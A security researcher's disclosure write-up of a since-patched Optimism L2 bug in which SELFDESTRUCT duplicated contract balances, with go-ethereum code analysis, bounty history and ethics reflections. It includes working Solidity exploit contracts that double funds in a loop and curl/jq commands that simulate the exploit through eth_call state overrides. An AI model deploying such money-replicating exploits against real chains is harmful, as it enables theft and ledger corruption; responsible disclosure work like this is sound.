Attacking an Ethereum L2 with Unbridled Optimism

The Summary

On 2/2/2022, I reported a critical security issue to Optimism—an "L2 scaling solution" for Ethereum—that would allow an attacker to replicate money on any chain using their "OVM 2.0" fork of go-ethereum (which they call l2geth).

Quickly, Optimism—whose platform currently uses a centralized "sequencer"—moved to both fix this bug on their nodes and infrastructure, as well as arrange for downstream projects that used their codebase (Boba and Metis) to get patched.

This article provides the backstory of how and why I found this bug and goes into my usual "extreme" level of detail on how the bug works (something I haven't bothered to do in article form in a while: I've mostly been just giving talks).

I will also be giving a talk at ETHDenver 2022, at 9:40am MST on February 18th, on this vulnerability. If you want to meet me while I'm there, I should be available for much of the event. (I'm also a "mentor", but that seems to be flexible.)

This article slowly transitions from high-level background and discussion into deep, low-level technical detail; but, at the end, I return for some high-level thoughts on the ethics of security research and incentive alignment in the cryptocurrency industry. If you start thinking "this is getting dry", try skipping ahead!

My Background

I am Jay Freeman, though I am mostly known online as "saurik" for my work on Cydia, an alternative to the App Store for jailbroken iOS devices. While I was a member of key jailbreak teams, I focused on everything "after the hack".

In other past work, I developed multiple jailbreaks for Android (implementing mempodipper and Master Key), wrote the first decompiler for .NET (Exemplar, for my Anakrino GUI), and worked on nmap's programmatic scanning features.

I give a lot of talks at conferences, where I sometimes present "Penn & Teller"-style exposés of exploit stacks. (This means my life for the past two years has been extremely reclusive and unhealthy, as I do not enjoy online conferences.)

I now am one of the remaining founders of Orchid, a project that builds a market for programmable bandwidth, along with Steven Waterhouse (a founding partner of Pantera Capital) and Brian Fox (developer of bash, readline, etc.).

Orchid Nanopayments

For Orchid, while I have no official/ratified title, I am "in charge of technology". In particular (as relevant to this article), I have implemented all of Orchid's smart contracts, including the one used for "nanopayments".

(While going into details of Orchid would be a digression, the reason Orchid cares about this is that users incrementally pay for access to the network with tiny payments, the fees for which would otherwise be too high.)

Our nanopayments integration—designed primarily by David Salamon, Justin Sheek, and myself, while leaning on the work done previously by Ronald L. Rivest at MIT and PepperCoin—amortizes transaction fees for very small transfers.

While, over enough time, our system can amortize even very large transaction fees, there are side effects: the size of the payments goes up and the number of payments goes down, leading to a higher variance of expected vs. actual payment.

It is thereby interesting to Orchid when people create new, cheaper blockchain technology, as Orchid's payments infrastructure is not inherently tied to any single chain, and a lot of my work involves exploring and evaluating new options.

Layer 2 Scaling

Orchid is, in some sense, what one might call a "layer 2 scaling solution": a payments system that runs as an ecosystem on top of another payments system. In our case, we implement what I have sometimes called a "probabilistic rollup".

Our nanopayments system certainly isn't the only layer 2, and—being mostly off-chain with probabilistic settlement—isn't even a prototypical one. That said, it is common for people to quibble over what, exactly, another system can be "considered".

The more commonly cited layer 2 solutions are systems such as Optimism or zkSync: each a prototypical example of an "optimistic rollup" and a "zero-knowledge rollup" (respectively). Vitalik (of Ethereum) wrote an overview of rollups.

Interestingly, the "2" in layer 2 is sometimes a bit arbitrary: layer 2 solutions that don't involve committing linear amounts of state to the underlying layer 1 can often compose or stack, allowing our nanopayments to run on another layer 2.

Cross-Chain Bridges

Many of the largest hacks we hear about in crypto happen to "bridges", the contracts and protocols that allow users of one blockchain to work with assets on another blockchain. These are often needed even between an L2 and its L1.

As it is usually actually impossible to be assured of "finality"—the property that a transaction has once and truly committed and will never be reversed for any reason—in blockchain consensus systems, these bridges are fraught with inherent peril.

Often, at the end of the day, they end up even relying on trusted third-parties to authorize "withdrawals" (similar to banks, but before you try to claim "omg they re-invented banks": the ability to permissionlessly create a bank is a feature).

The mechanism generally involves depositing money in a locked-up reserve on one side of the bridge and then printing an IOU on the other/remote side that can be traded and later redeemed to unlock some of the previously-deposited money from the reserve.

All the Bridges Falling Down

When bridges are attacked, generally someone managed to trick the smart contract that is holding the pile of money backing the IOUs to incorrectly release it, meaning IOUs on the other side of the bridge might not be redeemable.

On the same day that I reported the virtual machine bug discussed in this article to Optimism, a cross-chain bridge called Wormhole that connects Ethereum to Solana was hacked, and someone walked away with ~$325 million worth of Ether.

Maybe surprisingly, the company that owned Wormhole immediately decided to take responsibility for the issue, and replaced all of the money in the reserves. In the case of a previous hack on Poly Network, the hackers returned ~$610 million.

It is my contention that hacks on bridges tend to be noticed quickly, as the people operating the bridge generally notice when "their money" (which they owe to other people, of course) disappears. Fixing the issue involves replacing the stolen capital.

After the Hack

Even when hackers do steal money from a bridge, the ramifications are limited as "it's only money": if you steal the cash from a bank's vault, this is certainly a problem for them, and any "bail out" might be very costly for their backers...

...and yet, the bank should be thankful their record of accounts is safe: if they were no longer sure who owned what or which transfers were legitimate—with clients demanding conflicting corrections—the resulting dispute might never end.

(We can even here consider the idea of "insurance policies" against crypto hacks, particularly given that many of these bridges are semi-centralized and can "mitigate" hacks ahead of time, fixing issues before they result in loss.)

Such theft also tends to be maybe-surprisingly fruitless, with associated wallets being blacklisted by various exchanges (which people have postulated will cause the ecosystem problems in the future, making some Bitcoin akin to "blood diamonds").

My Attack: Unbridled Optimism

The bug presented here—which I dub "Unbridled Optimism"—can maybe be (crudely) modelled as a bug on the far side of a "bridge", but is actually a bug in the virtual machine that executes smart contracts on Optimism (an aforementioned L2 rollup).

Exploiting this enables the attacker to have access to an effectively unbounded number of tokens (aka, the IOUs) on the far side of the bridge. It is my contention that this is more dangerous than merely tricking the reserves into allowing a withdrawl.

With the ability to sneakily print IOUs (known on Optimism as OETH) on the other side of the bridge, you still can try to (slowly) withdraw money from the reserves, but now it will look like a legitimate transfer, making it easier to go unnoticed.

(And, in case you believe that "someone would notice if the total number of IOUs were different than the amount of money locked in the reserves", this bug actually was triggered 40 days ago—as I will point out later—and no alarm bells were raised.)

Maximum Carnage

Further, with your unbounded supply of IOUs, you could go to every decentralized exchange running on the L2 and mess with their economies, buying up vast quantities of other tokens while devaluing the chain's own currency.

Using your access to infinite capital, you could further manipulate on-chain pricing oracles to leverage for other attacks; and, until someone finally realizes your money is counterfeit, arbitragers will flock to the network to sell you their assets.

This makes this bug capable of economic griefing attacks, wherein once someone notices—even if it is a mere hour later!—it might be "too late" to unravel what is and what isn't a legitimate transaction, calling into question the entire ledger.

The next few sections involve a combination of lived and researched history of the Optimism project... which I entirely admit I might have gotten wrong somewhere. The goal here is to set up my interaction with the project and how I came to discover this bug, as I essentially write magazine-level content about software hacks ;P.

George Hotz Cameo

One of my favorite episodes of Optimism has a cameo by George Hotz, the hacker who first unlocked an iPhone (and then continued to work on jailbreaks for years before moving on to work on AI and aftermarket autonomous driving kits).

An early premise of Optimism was to support "non-interactive fraud proofs", wherein if the L2 state committed to L1 were "incorrect", someone could prove that to the smart contracts running on the system by using an (expensive) on-chain simulator.

The issue they had was that, for their model to work efficiently, Optimism couldn't build an interpreter, and instead needed a "transpiler" that replaced any instruction that accessed blockchain state with function calls on system smart contracts.

"geohot" (as he is known to many of us) helped them by writing a modification to the compiler for Solidity—the language most people use to write smart contracts—that would allow people to rapidly generate OVM-compatible contract code.

OVM 1.0 uses OVM_ETH ERC20

The issue with this—and bear with me here, as this is relevant—is that this strategy was only compatible at the level of Solidity source code and couldn't run existing contracts already compiled for the Ethereum Virtual Machine.

Even as they worked to fix this for the first real release of their "OVM", there was "historical baggage" that remained, both in the code and in the minds of the ecosystem that pushed the project down roads of further EVM incompatibility.

The biggest "most glaring" issue that I ran into while attempting to use Optimism at this time (late 2020) was that there was no native support for a "gas token": Ether stored on Optimism's L2 was instead represented by an ERC20 token.

We do not have built in native Ether support. For example, this means you will not be allowed to use BALANCE or SELFBALANCE (Note: you can use CALLVALUE, it will just always return 0).

All “ETH” on L2 will be an ERC20. Upon depositing ETH into our deposit contracts on L1, it will automatically be converted to ERC20 ETH on L2. If you wish to use ETH in your contract, instead just interact with it like you would with a normal ERC20 contract. This allows projects to not have to write their contracts to support both ERC20s and ETH, but rather just ERC20s (e.g. 0x, Uniswap).

We do have plans in the future to make our custom compiler automatically convert opcodes like BALANCE to ERC20ETH.balanceOf(addr) although this is currently not a priority until after mainnet. If this type of functionality is critical for your application, please let us know in Discord!

I'd actually read this, quite hopeful that this direction could be changed early on, and joined their Discord server on December 6th of 2020 in order to make the case that this incompatibility with the EVM semantics would lead to problems.

I ended up—as often happens with chat servers :/—in an argument with a random user who was acting extremely authoritative (to the point where I had started to model them as a key developer) that this was actually a great design decision.

Regardless, Orchid's multi-chain effort fundamentally requires that the same code be deployable on every network—so the list of supported chains can be "permissionless" and up to the user ecosystem—forcing me to pass on Optimism.

EVM "Equivalence"

Of course, a year later, it had become clear that not being compatible with existing smart contracts and developer tooling was, in fact, a serious problem; and, so, the Optimism project began work on what they called "EVM Equivalence".

This upgrade, to be named OVM 2.0, was of great interest to my work on Orchid, as it meant that the new multi-chain nanopayments platform I had been pushing us towards could finally be deployed. I thereby jumped back into Optimism.

When working with a new chain, the first thing I tend to do is run a quick unit test of functionality I either rely on or prefer (a test suite of sorts that has found bugs in numerous chains that I have reported over the past year).

Immediately, I ran into a confusing issue with Optimism: the account state—as cryptographically verifiable from the block "state root"—somehow was missing the account balance (which was, instead, always 0). I filed a bug about this.

OVM_ETH Lives on in OVM 2.0

The response to my bug report somewhat shocked me: it turned out that OVM 2.0 continued to store all of the balances for user accounts in the storage state of an ERC20 contract, and they were having an active discussion about whether to remove this.

Regardless, this became a continual "thorn in my side" as I began working on another project of mine the last month or so: an extremely pedantic and heavily-indexed block explorer that introspects every state update of the entire EVM.

Between this, that Optimism timestamps are backdated (something they did fix) or even non-monotonic, and how they keep rebooting their chain, Optimism has caused me to spend a disproportionate amount of time feeling... "pessimistic" ;P.

(However, I will say that the developers of this project are actually quite pleasant to work with, and so I have at least had fun talking with them on Discord while trying to access older data and filing bugs for high-level design issues.)

StateDB UsingOVM Redirection

The way this "store the native balances in an ERC20 token storage state" is implemented in the codebase is as a set of patches to go-ethereum's StateDB, the code which maintains an in-memory buffer of pending/dirty account objects to flush to disk.

(The way Ethereum stores this state—and the state trie data structure it uses to allow efficient cryptographic verification of cherry-picked data—is one of the more fascinating and useful parts of the protocol design; here is another reference.)

The UsingOVM flag is set with a USING_OVM environment variable (with no corresponding command line flag, as far as I know; that you need to set this environment variable while initializing the genesis block took me too long to figure out ;P).

Operations on the StateDB that affect an account balance are then redirected from the underlying stateObject (which represents an individual, cached account) to storage state in the OVM_ETH contract. Below is the code for state.StateDB.SetBalance.

NOTE: I heavily re-format and even somewhat "editorialize" code snippets to make them narrower, shorter, and less dense. If you go look at the actual code, don't be surprised when it doesn't look exactly the same as my presentation ;P.

func (s *StateDB) SetBalance( addr common.Address, amount *big.Int ) { if rcfg.UsingOVM { key := GetOVMBalanceKey(addr) value := common.BigToHash(amount) s.SetState(dump.OvmEthAddress, key, value) } else { stateObject := s.GetOrNewStateObject(addr) if stateObject != nil { stateObject.SetBalance(amount) } } }

Now, there's actually already something interesting going on: s.GetOrNewStateObject has an observable side effect; but, when UsingOVM, this doesn't get called. This means that an account might own native currency without having an account object!

The exact issue here is that contracts are able to ask for the hash of the code of other accounts (which is sometimes used to verify their trusted behaviors). If an account has no code, its code is "", so its codehash is the hash of an empty buffer.

However, if you ask for the codehash of an address that isn't currently backed by an object in the state trie, the codehash you get back is null. This observable effect is an example of the subtle incompatibilities that Optimism keeps experiencing.

(If this were my project, I'd definitely have dropped everything long ago—pre-OVM 2.0—to prioritize removing this set of patches by fixing GetOVMBalanceKey to store hash preimages, re-executing the chain, and then swapping out the state trie.)

Why is it always SELFDESTRUCT?!

One of the more "problematic" instructions in the Ethereum VM is SELFDESTRUCT, which goes back to the original design. (For clarity: this instruction used to be called SUICIDE, but the code—which we will be reading—was never renamed.)

This instruction allows a contract to destroy itself, removing its account object. The primary benefit of this instruction is that it allows for potentially large amounts of "obsolete" state to be cleaned up quickly from the blockchain's active set.

On the other hand, what makes this instruction "problematic" (besides its triggering name) is that it allows for potentially LARGE amounts of state to be cleaned up VERY QUICKLY, requiring the VM to do an arbitrary amount of work, atomically.

This instruction has further been known to continually cause corner cases in new EVM features, and so has often been threatened with some form of removal (such as banning it in new contracts or removing most of its functionality).


When a contract hits the SELFDESTRUCT instruction, it designates a "beneficiary" to receive any funds it still owns. The implementation of this opcode in go-ethereum's EVM adds the balance to the beneficiary and then calls StateDB.Suicide.

func opSuicide( pc *uint64, interpreter *EVMInterpreter, contract *Contract, memory *Memory, stack *Stack ) ([]byte, error) { state := interpreter.evm.StateDB beneficiary := common.BigToAddress(stack.pop()) balance := state.GetBalance(contract.Address()) state.AddBalance(beneficiary, balance) state.Suicide(contract.Address()) return nil, nil }

The implementation of StateDB.Suicide then clears the balance of the account back to 0. Frustratingly, it does this using neither the stateObject's setBalance setter nor to the shared common.Big0 constant, making this a bespoke piece of logic.

func (s *StateDB) Suicide(addr common.Address) bool { stateObject := s.getStateObject(addr) if stateObject == nil { return false } stateObject.markSuicided() = new(big.Int) // aka stateObject.setBalance(common.Big0) return true }

StateDB.Suicide, in turn, calls stateObject.markSuicided, which does nothing other than set a boolean value on the object to true. Importantly, this means that the contract at this point STILL EXISTS and continues to have the code it previously had!

func (s *stateObject) markSuicided() { s.suicided = true }

Pending Deletion

This begs the question: how does the object ever actually get destroyed? The answer is that this is postponed to the end of the transaction, when StateDB.Finalise is called and all of the suicided dirty account objects are marked deleted.

func (s *StateDB) Finalise() { for addr := range s.journal.dirties { obj, exist := s.stateObjects[addr] if !exist { continue } if obj.suicided || obj.empty() { obj.deleted = true } else { obj.finalise() } } s.clearJournalAndRefund() }

(As a further optimization, the actual account object isn't truly deleted until the next time the state root hash needs to be calculated, as all of the changes to the merkle trie can then be made and committed at once. This isn't relevant, though.)

func (s *StateDB) IntermediateRoot() common.Hash { s.Finalise() for addr := range s.stateObjectsPending { obj := s.stateObjects[addr] if obj.deleted { s.deleteStateObject(obj) } else { obj.updateRoot(s.db) s.updateStateObject(obj) } } return s.trie.Hash() }

The Actual Bug

By this point, we actually "passed by" the critical bug... did you catch it? ;P The code for Suicide is still directly modifying the stateObject's data.Balance field instead of checking UsingOVM and redirecting that modification to OVM_ETH.

This means that, when a contract self-destructs, its balance is BOTH given to the beneficiary AND ALSO KEPT. If the contract had 10 OETH, 10 OETH are CREATED from thin bits and handed to the beneficiary.

When Optimism fixed this bug—as part of PR #2146 (which slightly hid this update in a pile of other updates to give time for unknown forks to update their code)—they added the following logic to opSuicide (notably, not StateDB.Suicide).

if rcfg.UsingOVM && interpreter.evm.chainConfig .IsSelfDestructInflation(interpreter.evm.BlockNumber) { state.SubBalance(contract.Address(), balance) }

As far as I can tell, the reason they needed to put this code in opSuicide—which separates it from the other logic that directly clears the balance field as well as all of the other UsingOVM overrides—is so they can get access to the chainConfig.

This is important, because the code still needs to implement the wrong behavior to allow it to synchronize all of the historical state, some of which actually tickles this bug (without exploiting it). They decided block 3135900 would be the cutoff.

// OpMainnetSelfDestructForkNum is the height at which the // suicide inflation bug hardfork activates on OP mainnet. OpMainnetSelfDestructForkNum = big.NewInt(3135900)

Was this Exploited?

One of the questions we often want to answer is "has anyone else already pulled off an exploit using this bug?". To answer this, I instrumented the code for the OVM 2.0 to log any time a transaction destroyed a contract with a balance.

As SELFDESTRUCT is already a rare opcode, and this is even then a subset of all uses of SELFDESTRUCT—and further, as OVM 2.0 was only released three months ago—there was only a single user who had ever tried this: on Christmas Eve (2021).

In those transactions (as seen on the Optimism block explorer hosted by Etherscan) we see a user creating and destroying three contracts. The first two times, the contract's beneficiary is the 0x0 address, while the third time it is the user themself.

It frankly felt like someone had noticed the bug—seeing that Etherscan left the balance in place after the contract was destroyed—and even played with it a bit (to see if this was a behavior of 0x0)... but hadn't realized it was exploitable.

I actually managed to track down this user (!!) and it turns out they work for Etherscan ;P. It just goes to show that sometimes even people who are staring directly at a bug don't always see the indirect security implications.

I have not, myself, had time to verify that this was never triggered on the two known-to-me forks of Optimism: Boba and Metis. I feel like someone else might have checked by now and told me, and I also feel it is probably somewhat unlikely (given the lack of usage on Optimism), but I can't say for sure one way or the other at this time.

Concrete Exploit

Which brings us to the fun part: a hands on exploration of exploiting this bug. To do this, we need to write a contract (in Solidity) that we can deploy/fund and on which we can call SELFDESTRUCT, replicating the money it is holding.

As the contract continues to exist until the end of the transaction, and we want to replicate money as fast as possible (by compounding our earnings), we set the contract itself as the beneficiary. This way, each call to destroy doubles its funds.

To allow the contract to be funded in the first place, we have to add a payable constructor. Finally, we add a method that allows us to get the money back out of the contract (I originally used selfdestruct, but transfer is cleaner).

pragma solidity 0.7.6; contract Exploit { constructor() payable {} function destroy() public { selfdestruct(payable(address(this))); } function take() public { msg.sender.transfer(address(this).balance); } }

To drive this attack, we need another contract which creates an instance of this contract, calls destroy in a loop, and then calls take. I decided to put this logic in the constructor of the contract, so it could be created and executed in one transaction.

contract Attack { constructor(uint count) payable { Exploit exploit = new Exploit{value: msg.value}(); for (; count != 0; --count) exploit.destroy(); exploit.take(); msg.sender.transfer(address(this).balance); } receive() external payable {} }

As this contract will be receiving funds from the Exploit contract it instantiates, it needs a payable receive() implementation (as otherwise the contract will reject any attempt to give it money using transfer; notably, selfdestruct would bypass this!).

Safe/Easy Testing

While one way to test this exploit would be to run it, that not only might cause problems later on guaranteeing the state is still legitimate, but it could potentially tip off other people watching the blockchain looking to steal our exploit.

That might sound far-fetched, but it is actually quite common and is heavily automated: in this case, our exploit is so "plug-and-play" that if someone merely simulated running it themselves they would become the beneficiary.

While I will leave attempts to build more obfuscated exploits as "an exercise to the reader", if nothing else you need a way to test the behavior of your exploit while developing it, and so we need an easy way to simulate running instructions.

At this point someone might suggest an off-the-shelf test-driver—such as Ganache—but it wouldn't have this bug. We could give it the bug, but that's work. We could run our own local fork of Optimism, complete with sequencer, but that's also work.

Instead, we want a way to use a "normal" Optimism full node—preferably one we run ourselves (as we're talking about a very serious exploit), though for our exploration here the public endpoints will work just fine!—to run our exploit.

eth_call State Overrides

The solution is the JSON/RPC method eth_call. Now, I get it: "eth_call is obvious; I know about eth_call". (In case you don't: eth_call is a method exposed by Ethereum nodes that allows you to speculatively run exported Solidity functions.)

However, it isn't actually so obvious: if you read the documentation for eth_call, it is only going to let us run code that is already deployed to the blockchain, which we really want to avoid at all costs, lest someone notice our exploit.

The trick is that go-ethereum—the most commonly used EVM implementation—additionally supports "state overrides" on eth_call that let us pose hypothetical execution environments by changing the code or balance of an account.

Our strategy will thereby be to develop a tiny contract that scripts all of the behaviors we need (instantiating and funding Attack) and then returns any information we need to see if our code worked (in this case, our final balance).

contract Test { function test() public payable returns (uint256) { new Attack{value: msg.value}(1); return address(this).balance; } receive() external payable {} }

JSON/RPC via curl

To make this a "hands on" exercise, I'm going to walk you through compiling and executing this contract using nothing but curl, jq, xxd, and (for the Solidity compiler) docker (though you can alternatively install solc on your system).

NOTE: Optimism's public RPC server is (apparently) being run by QuickNode, and they only are set up to allow a trivial number of historical queries; so, when doing calls on old blocks, you might get a null result back with the error "Archive Requests/month limit reached - Please consider upgrading at"; if this happens, you will (sadly) have to run your own full Optimism node to see the result.

First we define an rpc variable to contain the URL of our Optimism full node. Then, we define an rpc function that will take a JSON object via stdin, add to it the JSON/RPC protocol fields using jq, and then post it to the RPC server using curl.

rpc= function rpc() { jq '.+{jsonrpc:"2.0",id:1}' | curl -H 'Content-Type: application/json' \ -s "$rpc" --data-binary @-; }

Next, we will compile the contract (named attack.sol); in the build folder we will have three .bin files, one for each of Exploit, Attack, and Test. These bin files don't actually represent the code for the contract: they are the code for the constructor.

# don't do this if you installed solc alias solc='docker run -v "$PWD":/mnt \ -w /mnt ethereum/solc:0.7.6' solc -o build attack.sol --bin --overwrite

The constructor returns the code for the contract itself, so we are going to override the state of a random account to make its code the code of this constructor (this would never actually happen) and then eth_call it to get its return value.

rnd=0x$(head -c 20 /dev/urandom | xxd -ps) tst=$(echo '{"method":"eth_call","params":[ {"to":"'"$rnd"'"},"latest",{"'"$rnd"'": {"code":"0x'"$(cat build/Test.bin)"'"} }]}' | rpc | jq -r .result)

Testing the Fix

Now that we have the code for the Test contract itself, we can override the code on our random address to that and then eth_call the test() method. We will also create a second address to be the caller, and override its state to own money.

frm=0x$(head -c 20 /dev/urandom | xxd -ps) function tst() { set -e; blk=$1; shift 1; echo '{"method":"eth_call","params":[{ "data":"0xf8a8fd6d", "from":"'"$frm"'", "value":"0x1", "to":"'"$rnd"'" },"'"$blk"'",{ "'"$frm"'":{"balance":"0x1"}, "'"$rnd"'":{"code":"'"$tst"'"} }]}' | rpc | jq -r .result; }

If you take the time to pull apart all of the shell quoting (sorry), you will note that the "data" we send to the contract is 0xf8a8fd6d. This is the first 32-bits of the keccak256 hash of "test()", which serves as the message selector for that function.

We can now run the exploit. The tst function I defined takes an argument blk (that must be in hex) which is the block number "at which" to run our code; this allows us to try running our code before and after OpMainnetSelfDestructForkNum.

$ echo $(($(tst $(printf 0x%x 3135900)))) 1 $ echo $(($(tst $(printf 0x%x 3135899)))) 2

When running this on a block after (or including) 3135900, we will only have the 1 token we started with (sent as the value parameter in tst). However, when running on blocks before 3135900, we get the result 2 (as Test has Attack double once).

Yet Another Incompatibility

At this point, you might wonder what happens if we try this on other EVM-compatible blockchains, such as Ethereum or Avalanche. We merely need to change the rpc variable and re-run tst. The result we get is... 0. Not 2 (of course), but also not 1.

$ rpc= $ echo $(($(tst latest))) 0

One of the tropes in the "Bag of Hacks" talk I give at hackathons and college classes is that, quite often, security fixes are done in a hurry by people who are attempting to mitigate a specific flaw and the resulting "fix" breaks something else.

I actually noticed this while testing Boba and Metis—which are forks of Optimism—in the middle of the night when I realized that they would also be affected (but wasn't sure if the Optimism people had reached out to them already; they had).

What is Wrong

In this case, the code that was added to opSuicide subtracted the prior balance from the contract to clear it. This is, to be fair, extremely reasonable behavior... I dare say it is more reasonable than the behavior Ethereum originally implemented ;P.

The way that the original code worked, however, is that it directly set the balance to 0. This means that if you selfdestruct to yourself, instead of 1+1-1 being 1, the resulting balance is forced to 0. I noted this in the discussion on the pull request.

(Honestly, I'm actually thinking this is "probably close enough", given that—as mentioned earlier—the OVM is already getting other semantics surrounding this wrong, and the result is just that money that would have been destroyed survives.)

(That said, it also wouldn't surprise me if these incompatibilities between the EVM and the OVM can be compounded with assumptions made by various contracts people might choose to deploy to expose and exploit other vulnerabilities.)

What follows is me being "super real" and attempting to enter into a particularly deep conversation about morality. Conversations like this are, in some sense, the dessert at the end of a long meal. The tech is over, but maybe you'd like to stay for a bit?

I partly say this because some people—who I notably do not consider part of "my audience" ;P—hate this stuff; but, I also say this because I want to be clear: these are vulnerable thoughts that people don't say out loud enough.

That said, I also sometimes think that these conversations only really work when done in person, during the third hour of a five-hour late-night Q&A session at a hackathon like SpartaHack. OMG do I miss attending in-person SpartaHack :(.

Crypto Ethi-nomi-cs

Something I tend to spend a lot of time talking about—as a "grey hat" security researcher who works in a field where we routinely hoard bugs and drop fully-weaponized exploits of 0-day vulnerabilities (our jailbreaks)—is "the ethics of hacking".

In the case of limited hardware and the fight against digital rights management (which includes use of Intel SGX, the reason I take issue with MobileCoin) the moral tradeoffs have become somewhat clear to me over the years.

However, working with cryptocurrencies feels a lot murkier. Do we truly believe that "code is law", and if someone finds a bug that lets them walk away with a billion dollars everyone should think "I guess I made a mistake"?

If you do, does your decision on that front change if you aren't going to personally profit, but will instead destroy a system people were using? FWIW, no matter how much we say "code is law", I personally have a hard time with destruction as ethical.

And yet, if we do not believe that destruction is ethical, and we are going to assign such strong moral judgement to people who destroy rather than build, how can we avoid falling into the trap of building systems that only work due to trust?

Move Fast and Lose Cash

So, one of the more "fun" things about working in crypto is exactly what makes it "scary": the (monetary) stakes tend to be extremely high. One ramification of this is that security research matters a lot more than in other fields of software.

And yet, a complaint that I too often have about crypto projects is that they sometimes seem to play fast and loose with consensus or correctness while they "move fast and break things" their way to access large amounts of investment capital.

Meanwhile, projects that take more conservative approaches are seen to "move slowly and too carefully"; and, as with Web 2.0 companies that spend "too much" time protecting user privacy before launching new features, they are at a disadvantage.

I thereby sometimes balk at "helping" other projects with basic issues of decentralization or security, as I feel like those can't be afterthoughts: this stuff is too important to be releasing quickly and adjusting the design in the field.

And yet, we see crypto project after crypto project trying to externalize the cost of their core design to people being only indirectly compensated, rather than building a team around mathematicians, economists, and security experts.

Financial Invectives

Meanwhile, there's a kind of fishy thing going on with many crypto projects, with what can feel like a "dark pattern" arising wherein projects force users to become invested in their project (by way of a token) to merely be customers.

The result is that it can be hard to trust anyone anymore, as seemingly every single participant—even ones that classically would have tried to remain neutral—suddenly are being pushed around by carefully designed monetary incentives.

To draw a realistic-to-crypto analogy: imagine if using Apple Music involved not a subscription fee, but proving you own some value in shares of Apple's stock. Now, if Apple goes up in value, so do the shares you are required to hold.

This thought demoralizes me at times (and I will note that Orchid has avoided such models). And yet, is this even new? Are "Apple fanbois" accidentally incentivized by their expensive hardware investment (and later resale value)?

I actually have been meaning to write an article on what I feel is a form of "runaway incentives" on the supply side—as opposed to with consumers—of some crypto projects, a topic I have occasionally written about so far only in random comments on Hacker News, GitHub, and Twitter.

If you would be interested in reading such, I recommend following me on Twitter. I also am usually quite open to giving (for free! I am a politician in California and don't want to deal with the honoraria restrictions) talks at hackathons or conferences, particularly if I don't have to travel far.

Exploitation Games

I've been working on incubating "exploits" (nothing else like this bug, to be clear) for a number of projects ("as one does" in security), and the discussion constantly comes up about "what to do with them"; and the answer just isn't at all obvious.

People discuss—sometimes clearly in jest, sometimes... not so much ;P—ways to profit off of hacks by releasing "epic takedowns" of various projects and shorting your way to riches, or start plotting "the perfect crime" (usually quite fanciful).

Over the years, I have heard many stories from hackers I have worked with—including both geohot and my good friends at—about bug bounty programs, but have never myself sought out or tried to participate in one.

I've often then felt that there just isn't enough "friendly" adversarialism in the crypto community. I'd love to see a conference where every single talk is "why protocol X will never work" without that being seen as "unconstructive".

I thereby tend to actually gravitate strongly towards projects that are willing to take a hard line with other projects and "duke it out" in benchmarks, articles, or analysis, calling out scams rather than merely ignoring them.

Bountiful Bug Bounties

Which finally brings me back to this Optimism bug. I needed a talk to give at ETHDenver (due to a scheduling SNAFU) and I saw that Optimism listed a bounty with Immunefi that has a $2,000,042 maximum payout for "critical" bugs.

(Technically, their Immunefi program did not cover this bug, as it is not in the explicit scope, so I couldn't go through Immunefi and had to reach out directly. But they have been extremely gracious and immediately said they would cover it equivalently.)

The program from Optimism isn't even the highest maximum listed on Immunefi: Olympus, which describes itself as "a decentralized reserve currency", has a bug bounty program listed with a maximum payout of $3,333,333!

This then gave me not one but two incentives to "bother with" dropping everything else I was doing to deeply analyze "that thing I saw that felt off but do I really care to look as I need to work on my own project (or even take a nap)".

Feeling Optimistic

And, in fact, Optimism decided to award the full $2M+42; ...which has the property of retroactively compensating me for the copious time I've spent analyzing their project this past year, as if I had been a team member.

(Which causes yet another interesting incentive alignment: I now feel "quite a bit grateful" to Optimism, and have come to like them more because of this award... maybe you shouldn't trust what I say about them? ;P)

We can also maybe feel good that the existence of this large bounty did what it set out to do: Optimism made a mistake, but they then incentivized—and quite generously so!—the work to correct it, protecting their users from loss.

(BTW, Boba and Metis—both forks of Optimism—had a max $100,000 and a max $1,000,000 bounty, respectively. It is an interesting question in some sense: should they share the responsibility of such a bounty?)

If nothing else, I successfully scored an invite to their party at ETHDenver ;P. Maybe I'll see some of you there!

I missed it in all of the bustle on Thursday, but apparently Boba Network officially announced that they would additionally extend to me their max award, which means the total is now $2,100,042... which might actually set a record for the largest bounty ever received for a single bug? (We had all not realized this until it was pointed out by a comment on Hacker News; though before it was only a technicality due to the +$42...the +$100k feels a lot more fair to claim a new record!)